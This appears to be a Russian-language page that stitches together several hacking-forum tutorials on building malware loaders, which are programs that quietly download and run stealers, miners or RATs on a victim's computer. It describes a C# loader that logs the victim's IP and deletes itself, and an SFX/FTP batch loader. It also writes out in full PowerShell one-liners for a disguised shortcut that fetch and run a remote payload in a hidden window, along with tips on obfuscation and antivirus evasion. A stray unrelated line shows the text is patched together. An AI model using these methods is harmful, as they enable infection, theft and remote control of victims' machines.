Как сделать лоадер для вируса

от admin

Свой лоадер на C#

DEEPSIDE

Как будет работать наш лоадер?
  • Сначала, после запуска, он отправить запрос на логгер, где сохранится IP жертвы
  • Далее он загрузит файл с сервера
  • Потом поместит файл во временную папку (Temp) и запустится
  • После чего самоудалится
Приступим.

Для начала создаём консольный проект, версия фреймворка 4.5

Сразу удаляем все юзинги, и добавляем нужные:

Логгирование.

Первым делом мы напишем функцию логгирования (отслеживания запуска файла по IP).

Создаём новый void с именем logger и переменной url:

Теперь в эту функцию (logger) добавляем переменную request, которая отвечает за web запрос:

Назначим полномочия пользователя:

Сейчас добавляем юзерагент, в данном случае это будет юзер агент браузера Firefox:

Ну и напоследок добавляем ответ от сервера:

Вот так должен выглядеть void logger:

  • Загрузка, запуск, самоудаление файла.

Теперь добавим самую важную функцию лоадера — загрузка файла.

Создаём новый void с именем load, и переменными link и filename

Добавляем путь до нашего файла, у нас он будет хранится во временной папке Temp:

Добавляем переменную user, которая содержит новый WebClient:

Теперь скачиваем файл:

Метод загрузки выглядит так:

Перед тем, как напишем функцию запуска файла, нам нужно добавить функцию самоудаления. Создаём новый void с именем DeleteMe и переменной delay:

Создаём новый процесс, всё объяснение в коментариях:

Метод DeleteMe выглядит так:

Теперь сделаем метод запуска файла, работать будет через планировщик задач.

Создаём void running, с переменной pth:

Создаём переменную с новым процессом:

Добавляем аргументы для запуска:

Перенаправляем стандартный вывод:

Отключаем выполнение оболочки

Запускаем процесс без окна

И запускаем процесс

Весь метод running выглядит так:

Теперь добавим рандомную генерацию строк для void'a running.

Создаём новый void generateString:

Добавим переменную symbols, в которой содержатся символы для рандомной генерации и переменную result, в которой будет содержатся результат генерации:

Теперь сама функция генерации:

Воид generateString() выглядит так:

На этом все функции закончены, осталось добавить их в главный void (Main)

Но перед этим, нам нужна ссылка-логгер

Для этого переходим на сайт далее выбираем "Невидимый логгер"

Видим следующую страницу:

Здесь нам нужна ссылка для сбора IP адресов. Копируем её.

Возвращаемся к коду, в main пишем:

В итоге, метод Main выглядит примерно так:

Теперь, нам нужно скрыть консоль при запуске лоадера.

Заходим в свойства проекта, далее делаем как на скрине:

Выбираем "Приложение Windows". Теперь консоль не открывается и лоадер запускается скрытно.

Для чего используются лоадеры?
  1. Маленький размер. То есть, если ваш вирус имеет огромный вес, просто воспользуйтесь лоадером, который весит
Итог. Что мы имеем?
  1. Вес файла

Обфусцировав код получаем такие детекты:

Заключение.

Сегодня мы написали загрузчик вирусов на C#, рассмотрели его возможное внутреннее устройство и преследуемые цели. Думаю каждый начинающий кодер открыл для себя что то новое, удачи.

Создаем LOADER 0 детектор/FUD 0

Всем привет. Читал я тут статейки и решил выложить свою. Выложить то, что завалялось на компе. Не знаю есть ли такая тема на форуме. Если тема не в том разделе, то прошу модераторов перенести. Вообщем, сегодня будем создавать loader стандартными средствами Windows.
Итак,

1) Сначала нам нужно найти хостинг с FTP доступом. Можете взять бесплатный, можете арендовать. И загружаем на него ваш вирус/майнер/стиллер и т.д.

2) Создаем текстовый документ и называем его "ftp.txt", без кавычек. Открываем его и вставляем туда следующее:

4) После создаем файл с названием "123.cmd", без кавычек и вставляем следующее:

Сохраняем всё в одной папке.

5) Далее Выделяем эти три файла -> ПКМ -> Добавить в архив.
Далее вылезет окно WinRar, там выбираем "Метод сжатия — максимальный", изменяем имя и ставим галочки на "Создать SFX архив" и "Создать непрерывный архив" и переходим во вкладку "Комментарии" и там вставляем следующее:

Читать:
Дан параллелепипед abcda1b1c1d1 докажите что

vt.png

И всё, жмем "ОК"
Теперь в папке с файлами появиться EXE файл, запустив его, у нас начнется скачивание файла в скрытом режиме.Посмотреть вложение 176

Ссылка на скан — ТЫК

antihack

Расскажу что такое лоадер (loader), и как он работает.
Лоадер, это одино из основных оружий хакера. Заражают этим вирусом чаще всего, через эксплойт. После заражения бот стучит в свою админку, и ждет команды хозяина. В админки боты распределяются по стране. Лоадер дает возможность хакеру, ПОДГРУЖАТЬ жертве N-oe количество файлов (обычно ехе) с последующим их выполнением (запуском). Т.о. ботнет становится под полным контролем владельца.
Лоадер будет сидеть в системе до тех пор, пока из админки не поступит команда самоудаления (чаще всего это происходит после загрузки 5-10 файлов жертве), либо пока эвристика вируса не попадет в базы антивирусных компаний.

БОТ — компьютер зараженный каким либо трояном/бэкдуром/соксом/лоадером/формгра ббером.

Заражаем компьютер вирусом с помощью простого ярлыка

В сегодняшней статье вы узнаете, как самостоятельно создать лоадер, который, в свою очередь, будет загружать наши вирусы на компьютер жертвы.

Всем салют, дорогие друзья!
Сегодня мы научим вас одному интересному приему, который, несмотря на свою простоту, используется хакерами в реальных атаках.

В этой статье вы узнаете, как самостоятельно создать лоадер, который, в свою очередь, будет загружать наши вирусы на компьютер жертвы.

    Для начала напомним, что такое лоадер:

Лоадер — это небольшой файл, который в обход фаерволов загружает нужный нам файл (ваш вирус — стиллер, майнер, RAT и т.д.) на машину жертвы и незаметно его запускает. Грузить файлы с помощью лоадера намного лучше, чем грузить файлы сразу. Так что вещь в хакерском хозяйстве незаменимая.

Итак, за дело!

    Первое, что нам понадобится — это совершенно любой бесплатный хостинг. Для примера мы будем использовать 000webhost.com
    Переходим на сайт -> выбираем бесплатный тариф -> проходим стандартную регистрацию:
    Переходим в панель управления и жмём вот так:
    Создаем новый файл:
    Выбираем наш файл и жмём Edit:
    Вставляем в данный файл следующий текст и сохраняем:

Invoke-WebRequest ссылка_на_файл_вируса -UseBasicParsing -OutFile TEMP.exe ; Start TEMP.exe

    Теперь нам нужно получить ссылку на наш файл. Сделать это очень просто: жмем правой кнопкой мыши по нашему файлу и выбираем View:
    После этого в вашем браузере откроется новое окошко. Перейдите в него и просто скопируйте ссылку из адресной строки браузера:
    Далее идем на сайт сократителя ссылок cuti.cc и вставляем в поле ссылку на .txt файл, который мы создавали выше:
    Отлично, у нас есть сокращенная ссылка. Не теряйте ее. Теперь создадим ярлык:
    В путь пишем вот это:

C:\WINDOWS\system32\cmd.exe /k powershell -W Hidden powershell -command (Invoke-webrequest -URI "ваша сокращенная ссылка" -UseBasicParsing).Content

    Ярлык-лоадер готов!

Несколько важных моментов

    Наверняка вам интересно, на кой черт использовать сокращатель ссылок?

Ответ прост: прописываемый в ярлыке путь имеет ограничение на длину символов. Исходная ссылка туда не влазит.

    Как сделать, что бы Windows Defender не палил наш лоадер?

Можно использовать скрипт обфускации повершелл https://github.com/danielbohannon/Invoke-Obfuscation , с целью обфусцификации команды которую мы пишем в путь. Выглядеть она будет после этого не как выше, а вот так:

-command (Invoke-webrequest -URI "ваша сокращенная ссылка" -UseBasicParsing).Content

    Что делать дальше?

Самое время поставить на файл ярлыка иконку и написать нужное название файла. Так как у ярлыка не видно расширения, можно так же добавить и его, например, дописав в конце имени файла .txt или любое другое. Если вам нужно увеличить размер файла, то можно накачать его любым пампером.

Похожие статьи